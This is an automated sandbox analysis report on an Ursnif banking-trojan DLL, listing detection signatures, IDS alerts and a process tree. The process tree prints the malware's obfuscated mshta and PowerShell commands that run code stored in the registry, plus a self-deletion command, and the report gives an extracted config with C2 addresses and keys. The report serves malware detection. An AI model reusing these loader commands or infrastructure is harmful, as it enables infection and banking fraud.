Edit tour
Windows
Analysis Report
HxEWwh74qT
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 7080 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\HxE Wwh74qT.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 7124 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\HxE Wwh74qT.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 7148 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\HxEW wh74qT.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6020 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - WerFault.exe (PID: 3380 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 080 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 6148 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 080 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 6048 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 080 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6304 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Lpje='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Lpje).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6932 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name wufx rouxe -val ue gp; new -alias -na me atvqcmf j -value i ex; atvqcm fj ([Syste m.Text.Enc oding]::AS CII.GetStr ing((wufxr ouxe "HKCU :Software\ AppDataLow \Software\ Microsoft\ 54E80703-A 337-A6B8-C DC8-873A51 7CAB0E").U rlsReturn) ) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6024 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\pkbugtx o\pkbugtxo .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6432 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RESD841. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\p kbugtxo\CS C26C720E9E BC041F0866 04EECC7DD3 CDD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 900 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\lboh4ml q\lboh4mlq .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5516 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RESED31. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\l boh4mlq\CS C3DF21D054 A9F4C66BF1 FA9CD771B1 F79.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3808 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 3904 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\HxEWwh74 qT.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 6948 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4184 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 6652 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r~1\AppDat a\Local\Te mp\5771.bi 1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 24 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 3 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/22/22-15:27:17.806871 04/22/22-15:27:17.806871 |
SID: | 2033203 |
Source Port: | 49775 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:27:18.629540 04/22/22-15:27:18.629540 |
SID: | 2033203 |
Source Port: | 49775 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:26:57.401743 04/22/22-15:26:57.401743 |
SID: | 2033203 |
Source Port: | 49771 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-15:27:19.716505 04/22/22-15:27:19.716505 |
SID: | 2033204 |
Source Port: | 49775 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_04DE3072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 3_2_04DE4CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 3_2_04DE3072 |
System Summary |
---|
Source: | Matched rule: |
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Matched rule: |
Source: | Process created: |
Source: | Code function: | 3_2_04DE821C | |
Source: | Code function: | 3_2_04DE198A | |
Source: | Code function: | 3_2_04DE475F | |
Source: | Code function: | 20_2_000002DC00808C30 | |
Source: | Code function: | 20_2_000002DC00803B64 | |
Source: | Code function: | 20_2_000002DC007F8D20 | |
Source: | Code function: | 20_2_000002DC00816814 | |
Source: | Code function: | 20_2_000002DC0080F83C | |
Source: | Code function: | 20_2_000002DC0081A84C | |
Source: | Code function: | 20_2_000002DC0081B7AC | |
Source: | Code function: | 20_2_000002DC007F47E4 | |
Source: | Code function: | 20_2_000002DC0080B910 | |
Source: | Code function: | 20_2_000002DC00816138 | |
Source: | Code function: | 20_2_000002DC007F711C | |
Source: | Code function: | 20_2_000002DC00813248 | |
Source: | Code function: | 20_2_000002DC007FC96C | |
Source: | Code function: | 20_2_000002DC0081099C | |
Source: | Code function: | 20_2_000002DC0081C1CC | |
Source: | Code function: | 20_2_000002DC007FD2EC | |
Source: | Code function: | 20_2_000002DC0081833C | |
Source: | Code function: | 20_2_000002DC007F1338 | |
Source: | Code function: | 20_2_000002DC007F4338 | |
Source: | Code function: | 20_2_000002DC007FA2F8 | |
Source: | Code function: | 20_2_000002DC007F1AF4 | |
Source: | Code function: | 20_2_000002DC00816C40 | |
Source: | Code function: | 20_2_000002DC00808454 | |
Source: | Code function: | 20_2_000002DC007F4C54 | |
Source: | Code function: | 20_2_000002DC0080D36C | |
Source: | Code function: | 20_2_000002DC0081AB84 | |
Source: | Code function: | 20_2_000002DC007FDBAC | |
Source: | Code function: | 20_2_000002DC008043BC | |
Source: | Code function: | 20_2_000002DC00815BD4 | |
Source: | Code function: | 20_2_000002DC00818BD8 | |
Source: | Code function: | 20_2_000002DC0080FCEC | |
Source: | Code function: | 20_2_000002DC00800500 | |
Source: | Code function: | 20_2_000002DC00807D50 | |
Source: | Code function: | 20_2_000002DC007FE464 | |
Source: | Code function: | 20_2_000002DC0080DC8C | |
Source: | Code function: | 20_2_000002DC0081CCC4 | |
Source: | Code function: | 20_2_000002DC0080ADF0 | |
Source: | Code function: | 20_2_000002DC00817650 | |
Source: | Code function: | 20_2_000002DC0080E578 | |
Source: | Code function: | 20_2_000002DC00819708 | |
Source: | Code function: | 20_2_000002DC0080BF14 | |
Source: | Code function: | 20_2_000002DC00801678 | |
Source: | Code function: | 20_2_000002DC007F1F34 |
Source: | Code function: | 3_2_04DE3A9C | |
Source: | Code function: | 3_2_04DE4695 | |
Source: | Code function: | 3_2_04DE25D7 | |
Source: | Code function: | 3_2_04DE8441 | |
Source: | Code function: | 20_2_000002DC008010B4 | |
Source: | Code function: | 20_2_000002DC007F59D4 | |
Source: | Code function: | 20_2_000002DC007F79AC | |
Source: | Code function: | 20_2_000002DC007F2B58 | |
Source: | Code function: | 20_2_000002DC00817D48 | |
Source: | Code function: | 20_2_000002DC007F8D20 | |
Source: | Code function: | 20_2_000002DC00817DB4 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Code function: | 3_2_04DE6DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_04DEB301 | |
Source: | Code function: | 3_2_04DE821B | |
Source: | Code function: | 3_2_04DE7E29 | |
Source: | Code function: | 20_2_000002DC008253CA |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
